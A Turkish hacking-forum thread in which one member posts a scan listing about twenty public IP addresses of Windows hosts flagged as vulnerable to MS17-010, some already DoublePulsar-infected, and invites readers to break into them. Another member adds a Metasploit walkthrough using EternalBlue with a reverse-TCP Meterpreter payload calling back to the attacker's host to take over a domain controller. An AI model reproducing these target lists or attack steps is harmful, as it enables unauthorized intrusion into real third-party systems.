İPUCU

Seçenekler

MS17_010 Zafiyeti(açıklı hostlar)

14-06-2018 15:20
#1
fuzzbunch - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Mugla
Mesajlar:
153
Teşekkür (Etti):
3
Teşekkür (Aldı):
25
Konular:
27
Ticaret:
(0) %
Açıklı sunucular
Kod:
[+] 125.234.129.85:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[+] 92.247.173.151:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[+] 123.51.213.29:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[!] 123.51.213.29:445     - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0xE86259E3
[+] 196.43.128.7:445      - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Standard 6002 Service Pack 2 x86 (32-bit)
[+] 60.250.53.142:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 91.104.193.168:445    - Host is likely VULNERABLE to MS17-010! - Windows 8 Pro 9200 x64 (64-bit)
[+] 218.89.119.160:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[+] 203.128.14.77:445     - Host is likely VULNERABLE to MS17-010! - Windows 8.1 Pro 9600 x86 (32-bit)
[+] 95.31.84.48:445       - Host is likely VULNERABLE to MS17-010! - Windows 8 Enterprise 9200 x64 (64-bit)
[+] 188.52.164.92:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[+] 178.252.99.231:445    - Host is likely VULNERABLE to MS17-010! - Windows 8 Single Language 9200 x64 (64-bit)
[+] 94.242.198.221:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[+] 95.71.201.2:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[+] 93.122.179.28:445     - Host is likely VULNERABLE to MS17-010! - Windows 10 Enterprise 2016 LTSB 14393 x64 (64-bit)
[+] 31.180.57.177:445     - Host is likely VULNERABLE to MS17-010! - Windows 8 Enterprise 9200 x64 (64-bit)
[+] 81.169.157.134:445    - Host is likely VULNERABLE to MS17-010! - Windows (R) Web Server 2008 6002 Service Pack 2 x86 (32-bit)
[!] 81.169.157.134:445    - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x7D73983B
[+] 61.228.140.226:445    - Host is likely VULNERABLE to MS17-010! - Windows 8 9200 x64 (64-bit)
[+] 134.0.57.155:445      - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Standard 6001 Service Pack 1 x86 (32-bit)
Konu fuzzbunch tarafından (16-06-2018 19:11 Saat 19:11 ) değiştirilmiştir.

14-06-2018 15:23
#2
RedWormZ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2018
Nereden:
Istanbul
Mesajlar:
978
Teşekkür (Etti):
27
Teşekkür (Aldı):
152
Konular:
30
Ticaret:
(0) %
sunucu sızma hakkında bilgi, konu, video?
Kullanıcı İmzası
Yıllar önce Hack dediğimizde alaycı bakışlar, şimdi alay eden insanlar ayakta alkışlar
Yanıltmasın Seni Melek Bakışlar, Bazen Şeytan Bile Bizi Ayakta Alkışlar.

RedWormZ

Servan Can
#Servan Can - #RedHacktivist
14-06-2018 15:25
#3
fuzzbunch - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Mugla
Mesajlar:
153
Teşekkür (Etti):
3
Teşekkür (Aldı):
25
Konular:
27
Ticaret:
(0) %
sızma yontemlerini internetten arastırabılırsınız binlerce video,makale ve bilgilendirici yazı var .
14-06-2018 15:43
#4
Zunfix - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2016
Nereden:
about:blank
Mesajlar:
3.509
Teşekkür (Etti):
116
Teşekkür (Aldı):
649
Konular:
486
Ticaret:
(0) %
Bunlar yama almamış serverlarmı ?
Kullanıcı İmzası
Çok da umrumda...
14-06-2018 15:48
#5
zWhyDead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
n/aN
Mesajlar:
364
Teşekkür (Etti):
35
Teşekkür (Aldı):
24
Konular:
51
Ticaret:
(0) %

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme



Merhaba,

Öncelikle MS17-010 zafiyeti nedir ? ve nasıl public olmuştur ?

Bu siber saldırının baş rolü olan WannaCry fidye yazılımı, kurbanlarına Microsoft Windows’un SMBv1 sisteminde bulunan ve Microsoft Güvenlik Bülteni MS17-010 kapsamında tanımlanıp kapatılmış olan bir güvenlik açığından faydalanarak bulaşmaktadır. Kullanılan “Eternal Blue” adlı exploit, 14 Nisan 2017‘de ShadowBrokers tarafından NSA‘in hacking araçlarını ifşa etmesiyle ortaya çıkarılmıştır.

Not: Exploit-db üzerinde python dili ile yazılmış exploit mevcuttur, dilerseniz direk ****sploit üzerindende çalıştırabilirsiniz.

Uygulama!

Öncelikle "msfconsole" komutu ile son exploitleri download ediyoruz. Ardından ise "msfconsole" komutunu kullanarak ****sploit'i çalıştırıyoruz.

Bir sonraki adımda ise "searche ms17-010" komutunu çalıştırarak ms17-010 exploitinin dizinin aratıyoruz. Burdan sonra ise hedef sistemde zafiyetin false positive oldugunu tespit etmemiz gerekiyor, bundan dolayı use" komutunu kullanarak "auxiliary/scanner/smb/smb_ms17_010" dizinine gidiyoruz, ardından ise "set RHOSTS <HEDEF_IP>" şeklinde girerek "run" komutunu çalıştırıyoruz. Görüldüğü gibi "Host is likely BULNERABLE to MS17-010!" yazısını gördük ve zafiyetin hedef sistemde oldugunu doğruladık.


Şimdi ise exploiting adımına geldik burada yapmamız gereken "use exploit/windows/smb/ms17_010_eternalblue" dizinine giriyoruz ve "show options" komutu ile detaylı bilgi alıyoruz, "set RHOST <HEDEF_IP>" şeklinde girilir, şimdi ise hedef sisteme girerken admin hakları ile girmek istediğim için "set ProcessName lsass.exe" yazıyoruz lsass.exe windows işletem sistemlerinde admin yetkili processlerden birisidir. Ardından ise bize bir reverse bağlantı gelmesi için payload girmemiz gerekiyor bunun için" set payload windows/x64/meterpreter/reverse_tcp" komutunu kullanıyoruz yani gelen bağlantı meterpreter satırına düşecektir. Son olarak "set <LHOST SALDIRGAN_IP>" şeklinde local ip adresi girilir "ifconfig" komutu ile görebilirsiniz ve "set LPORT <SALDIRGAN DİNLEME PORTU>" şeklinde girilir. ve son olarak "run" komutu ile exploiting işletmi başlatılır.

Görüldüğü gibi sistemden gelen bağlantı ve ADMIN haklarına sahip olarak domian controller'i ele geçirdik.

Çözüm; https://technet.microsoft.com/en-us/.../ms17-010.aspx adresinden update geçebilirsiniz.

Hocam Siteleri Konuma Ekleyebilir miyim ?
Kullanıcı İmzası
2016 - ∞
Konu "Squ4LL tarafından (14-06-2018 16:00 Saat 16:00 ) değiştirilmiştir.
14-06-2018 16:51
#6
GHosT1041 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2018
Mesajlar:
24
Teşekkür (Etti):
1
Teşekkür (Aldı):
2
Konular:
2
Ticaret:
(0) %
Alıntı:
fuzzbunch´isimli üyeden Alıntı Mesajı göster
sızma yontemlerini internetten arastırabılırsınız binlerce video,makale ve bilgilendirici yazı var .
kanka bunu buraya attın ama kimse kullanmayacak :d
14-06-2018 17:16
#7
Prolayt - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2015
Mesajlar:
390
Teşekkür (Etti):
48
Teşekkür (Aldı):
19
Konular:
59
Ticaret:
(0) %
armitage ile de yapabilirsiniz hiç birşey bilmiyorsanız
16-06-2018 19:04
#8
fuzzbunch - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Mugla
Mesajlar:
153
Teşekkür (Etti):
3
Teşekkür (Aldı):
25
Konular:
27
Ticaret:
(0) %
Alıntı:
Zunfix´isimli üyeden Alıntı Mesajı göster
Bunlar yama almamış serverlarmı ?
evet oyle ama bu serverları test etmedim merakı olan varsa dahada bulabilirim.bu işle ugrasan kişiler rahatlık ile arastırıp sızabilirler.usteki arkadasın verdıgı vıdeoda exploit etme asamasında fayda saglayacaktır

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı